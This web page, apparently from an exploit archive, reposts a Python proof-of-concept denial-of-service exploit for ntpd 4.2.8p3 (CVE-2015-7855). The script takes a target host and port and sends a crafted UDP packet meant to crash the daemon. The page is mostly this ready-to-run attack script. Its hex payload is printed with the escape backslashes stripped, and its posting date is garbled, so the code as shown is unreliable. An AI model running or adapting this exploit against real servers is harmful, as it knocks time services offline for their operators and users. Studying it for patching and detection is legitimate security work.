Home / os / solaris

NTP 4.2.8p3 Denial Of Service Exploit

Posted on 30 November -0001

<HTML><HEAD><TITLE>NTP 4.2.8p3 Denial Of Service Exploit</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>#!/usr/bin/env python # Exploit Title: ntpd 4.2.8p3 remote DoS # Date: 2015-10-21 # Bug Discovery: John D "Doug" Birdwell # Exploit Author: Magnus Klaaborg Stubman (@magnusstubman) # Website: http://support.ntp.org/bin/view/Main/NtpBug2922 # Vendor Homepage: http://www.ntp.org/ # Software Link: https://www.eecis.udel.edu/~ntp/ntp_spool/ntp4/ntp-4.2/ntp-4.2.8p3.tar.gz # Version: All ntp-4 releases up to, but not including 4.2.8p4, and 4.3.0 up to, but not including 4.3.77 # CVE: CVE-2015-7855 import sys import socket if len(sys.argv) != 3: print "usage: " + sys.argv[0] + " <host> <port>" sys.exit(-1) payload = "x16x0ax00x02x00x00x00x00x00x00x00xa0x6ex6fx6ex63x65x3dx64x61x33x64x35x64x30x66x66x38x30x38x31x65x63x38x33x35x32x61x32x32x38x36x2cx20x66x72x61x67x73x3dx33x32x2cx20x6cx61x64x64x72x3dx39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39" print "[-] Sending payload to " + sys.argv[1] + ":" + sys.argv[2] + " ..." sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.sendto(payload, (sys.argv[1], int(sys.argv[2]))) print "[+] Done!" </BODY></HTML>

 

TOP